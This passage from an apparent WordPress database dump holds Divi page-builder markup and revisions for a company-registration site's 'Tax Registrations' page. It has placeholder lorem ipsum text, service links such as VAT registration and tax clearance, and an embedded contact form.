_builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Tax Registrations','','publish','closed','closed','','tax-registrations','','','2019-08-16 09:48:07','2019-08-16 07:48:07','',0,'https://companyregistration.online/?page_id=32714',0,'page','',0),(32715,3,'2019-08-14 08:47:29','2019-08-14 06:47:29','<!-- wp:divi/placeholder /-->','Tax Registrations','','inherit','closed','closed','','32714-revision-v1','','','2019-08-14 08:47:29','2019-08-14 06:47:29','',32714,'https://companyregistration.online/32714-revision-v1/',0,'revision','',0),(32861,3,'2019-08-16 09:48:07','2019-08-16 07:48:07','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Tax Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.6\" width=\"54%\" max_width=\"65%\" module_alignment=\"center\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Being Tax Compliant  Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus.</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/vat-registration-urgent/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/vat-registration-urgent/\"][/et_pb_blurb][et_pb_blurb title=\"Tax Clearance Certificate\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/tax-clearance-certificate/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/tax-clearance-certificate/\"][/et_pb_blurb][et_pb_blurb title=\"Import & Export Code Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/import-and-export-code-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/import-and-export-code-registration/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Salary Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/salary-tax-registration-paye/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/salary-tax-registration-paye/\"][/et_pb_blurb][et_pb_blurb title=\"Business Income Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\"][/et_pb_blurb][et_pb_blurb title=\"Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/vat-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/vat-registration/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest  Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Tax Registrations','','inherit','closed','closed','','32714-revision-v1','','','2019-08-16 09:48:07','2019-08-16 07:48:07','',32714,'https://companyregistration.online/32714-revision-v1/',0,'revision','',0),(32723,3,'2019-08-14 10:47:42','2019-08-14 08:47:42','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" 